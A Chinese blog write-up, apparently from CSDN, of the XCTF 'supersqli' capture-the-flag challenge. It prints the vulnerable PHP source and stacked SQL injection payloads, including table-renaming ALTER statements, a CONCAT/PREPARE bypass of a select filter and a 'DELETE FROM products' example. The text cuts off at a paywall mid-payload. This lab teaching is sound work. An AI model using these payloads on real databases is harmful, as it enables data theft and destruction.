攻防世界Web进阶3(4分5分题)

最新推荐文章于 2023-07-24 10:38:13 发布
最新推荐文章于 2023-07-24 10:38:13 发布
阅读量1.4k 收藏 3
点赞数 3
分类专栏: CTF刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chuxuezheerer/article/details/104219527
版权
这篇博客详细介绍了攻防世界Web进阶中的几道题目,涉及SQL注入和模板注入技术。首先,通过堆叠注入解决supersqli题目,然后在FlatScience题目中利用SQLite数据库的特性进行SQL注入。在easytornado中,博主分析了Tornado框架的模板注入,通过render渲染漏洞获取信息。接着是Cat题目,通过Fuzzing发现特殊字符并利用数据库文件解析。在ics-04中使用Sqlmap进行SQL注入,最后在shrine和ics-05题目中分别利用Jinja模板注入和preg_replace函数漏洞来解题,最终获取flag。
摘要由CSDN通过智能技术生成

文章目录

一.supersqli

First 解题分析:

根据提示,知道这是一道注入的题
(1)首先判断是否存在注入点
在输入框里尝试:

1' and 1=1# //成功
1' and 1=2# //失败

(2)获取列数

1' order by 2# //正确

1' order by 3# //报错

在这里插入图片描述

所以推测有两列

(3)开始注入
开始想用union联合查询进行爆破
但是发现不行,会返回这样的错误信息:
在这里插入图片描述

分析:
preg_match 函数用于执行一个正则表达式匹配。
在这里插入图片描述

可以看到限制使用了select等方法

之后用堆叠方法进行注入。

堆叠注入

1.知识点:
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

参考链接:https://www.cnblogs.com/0nth3way/articles/7128189.html

2.本题内容

<?php
function waf1($inject) {
   
    preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);');
}
function waf2($inject) {
   
    strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")');
}
if(isset($_GET['inject'])) {
   
    $id = $_GET['inject'];
    waf1($id);
    waf2($id);
    $mysqli = new mysqli("127.0.0.1","root","root","supersqli");
    //多条sql语句
    $sql = "select * from `words` where id = '$id';";
    $res = $mysqli->multi_query($sql);
    if ($res){
   //使用multi_query()执行一条或多条sql语句
      do{
   
        if ($rs = $mysqli->store_result()){
   //store_result()方法获取第一条sql语句查询结果
          while ($row = $rs->fetch_row()){
   
            var_dump($row);
            echo "<br>";
          }
          $rs->Close(); //关闭结果集
          if ($mysqli->more_results()){
     //判断是否还有更多结果集
            echo "<hr>";
          }
        }
      }while($mysqli->next_result()); //next_result()方法获取下一结果集,返回bool值
    } else {
   
      echo "error ".$mysqli->errno." : ".$mysqli->error;
    }
    $mysqli->close();  //关闭数据库连接
}
?>

这里的重点是multi_query()函数:执行一条或多条sql语句,然后将结果全部输出。这就使堆叠注入有了前提。

3.开始堆叠注入:
(1)查看表

1';show tables;

在这里插入图片描述

(2)查看字段

1';show columns from `1919810931114514`#

在这里插入图片描述

1';show columns from `words`#

在这里插入图片描述
在这里插入图片描述

可以看到我们要想获得flag,需要访问“1919810931114514”表中flag字段的内容。

(3)查看具体内容
这里有两种方法进行解题:
思路一:
正常输入1时,推测显示的应该是words里的内容,所以,通过数据库注入修改191…这个表名字为words,得到显示。

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

拆分开来如下

1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#

之后在显示所有内容即可

1' or 1=1#

在这里插入图片描述

方法二:
通过对select进行预编译的方式绕过对select的检测:
预编译相关语法如下:

set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句

构造:

-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

拆分开来如下

-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;
#

可以看到:还是做了一定的限制
在这里插入图片描述

但是经过以前的学习知道,strstr这个函数对大小写并不敏感,所以把原来的命令换成大写就行:

-1';set @sql = CONCAT('se','lect * from `
最低0.47元/天 解锁文章
chuxuezheerer
关注
专栏目录
攻防世界 web高手进阶区 8分题 love_math
闵行小鱼塘
10-03 1129
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是love_math的writeup
攻防世界web进阶区Cat
gongjingege的博客
07-30 457
题目描述:抓住那只猫 打开链接 刚开始以为是注入,但是发现好像都被过滤了 试着输入了loli.club,页面没反应,输了下127.0.0.1 到这也不知道这题是在考啥 没办法,百度了下,是diango报错,是将输入的参数传到了后端的django服务中进行解析,而django设置了编码为gbk导致错误编码了宽字符(超过了ascii码范围) 所以这里可以传递%80,url编码使用的是16进制,80也就是128,ASCII码是从0-127,所以这个时候会报错 试着在报错页面找到一些信息 发现文件的绝对路径是
攻防世界web高手区supersqli解法(详细)
qq_53105813的博客
05-25 1929
supersqli 翻译一下为超级数据库 打开题目很明显,直接想到sql注入 验证一下猜想 提交 1’ and 1=1#和1‘ and 1=2#(输入框中没有显示在url中) 说明存在注入漏洞 接下来用order by判断字段 提交 1'order by 2# 提交 1'order by 3# 说明只有两个字段爆出 接下来尝试爆数据库名 提交: 1'union select 1,database()# 返回错误信息 return preg_mat...
supersqli
最新发布
陈艺秋的博客
07-24 395
查询数据库,发现正则过滤,并且不区大小写,尝试过/**/注释符对select隔,但是识别不了,哪还有一种方法就是堆叠注入。查表,只包含两个表,但是select被过滤掉了,所以我们可以使用show columns来查看表中字段。这个时候就要发散一下思维,可以看到之间传参1所回显的数据,和words表字段的结构其实是差不多的。这里就是默认将接受到的参数传递给words表的id字段,然后回显id字段对应的字符串数据。尽量一次性做完哦,不然有可能变成以下这样,其实变成这样,也可以验证咱的思路。
攻防世界-supersqli
weixin_43960066的博客
03-27 452
由于没有对alter,rename做出过滤,将1919810931114514修改为words,将flag修改为id,同时将words修改为其他的,将id也修改为其他的。由于过滤了一些关键字,所以想要得到flag可采取预编译、修改flag的名字为id修改1919810931114514为words(即可在搜索框中直接输入即可)发现flag在数字表中,同时判断当前正在使用的就是supersqli这个数据库,输入框中输入1就是查询的word表。想要得到flag需要使用的语句为。使用堆叠注入,查看数据库。
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1366
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
攻防世界 web高手进阶区 10分题 TimeKeeper
闵行小鱼塘
10-19 1443
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是TimeKeeper的writeup
攻防世界 web高手进阶区 10分题 url
闵行小鱼塘
10-19 1613
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是url的writeup
攻防世界 web高手进阶区 5分题(cat、bug)
闵行小鱼塘
07-26 630
继续ctf的旅程,攻防世界web高手进阶区的2分题(cat、bug)
攻防世界 web高手进阶区 10分题 xss1
闵行小鱼塘
11-10 758
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是xss1的writeup
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 461
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
攻防世界 supersqli(堆叠注入)
m0_56107268的博客
05-04 1831
1.首先判断有无注入点: 1’ and 1=1 # 1' and 1=2 # 2.进行注入 判断字段数 1' order by 2 # //两个字段 判断字段注入点 1' union select 1,2 # 出现一个正则替换 查看其他人博客,发现是使用堆叠注入 堆叠注入原理? mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 堆叠注入触发条件 堆叠注入触发的条件很
[强网杯 2019]随便注
qq_41696518的博客
05-18 225
[强网杯 2019]随便注 打开网址,发现这是一道SQL注入题目 对sql注入题目,先查询有哪几张表,提交框输入1’ or 1=1;# 试试 发现并没得到啥有效信息。于是看看这输入框中查询的表有几列字段,直到输入1’ order by 3;# 发现报错误,说明只有两列。 知道两列后再搞清楚该输入框查询的是哪张表。输入1’; show tables;# ,显示在该数据库下存在两张表,1919810931114514,words 知道存在两张表后,查询这两张表的列字段,看看有没有啥有效信息 进入word表
【BUUCTF】Web题解
xuanyulevel6的博客
08-08 5458
【BUUCTF】Web题解
Python的集合(set)类型、None类型.....
O2_H2O的博客
02-01 404
Python的集合(set)类型、None类型.....
mysql 关键词绕过_关于SQL注入绕过的一些知识点
weixin_34698515的博客
01-19 395
一、绕过waf思路从第一步起,一点一点去析,然后绕过。1、过滤 and,orpreg_match('/(and|or)/i', $id)Filtered injection: 1 or 1 = 1 1 and 1 = 1Bypassed injection: 1 || 1 = 1 1 && 1 = 12、过滤 and, or, unionpreg_match('/(and|or...
攻防世界-supersqli(堆叠注入)
m0_62094846的博客
12-23 2181
输入1正常显示,输入1‘报错,可以判定是注入 输入2可以,3不行,可以知道有2个字段 然后判定回显位 1' union select 1,2# 过滤了挺多东西的,双写select也无法绕过 看了wp,是堆叠注入 查找数据库 ?inject=1';show databases;--+ 查看表 -1';show tables;--+ 查看words表 -1';desc words;--+ 查看1919810931114514表 -1'...
xctf攻防世界 MISC高手进阶区 黄金六年
热门推荐
l8947943的博客
02-05 1万+
1. 进入环境,下载附件 题目给的一个视频文件,黄金6年,看完视频后深深觉得程序员的技术栈不容易啊!!! 然后,每一只张图片都飞快的闪过,怀疑有隐藏信息。。。 2. 问题析 视频信息提取 使用pr打开文件,一帧一帧的过一下,发现有东西。 扫出来key: i 扫出来key:want 扫出来key:play 最后一个二维码给我截哭了,我死活看不出,用别人的图吧: 扫出来key:ctf 所有的key组合起来就是iwantplayctf 视频隐藏文件离 将文件丢入winhex中,我们可以看到最后
flask jinja2 mysql_flask/jinja2 SSTI注入学习
weixin_31128065的博客
02-15 268
0x00 前言服务端模板注入(SSTI)攻击,可以看看James Kettle写的这篇文章。flask出现模板注入原因主要还是因为使用了render_template_string函数0x01 环境搭建test.py12345678910111213141516171819from flask import Flask,render_template,config,render_template_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值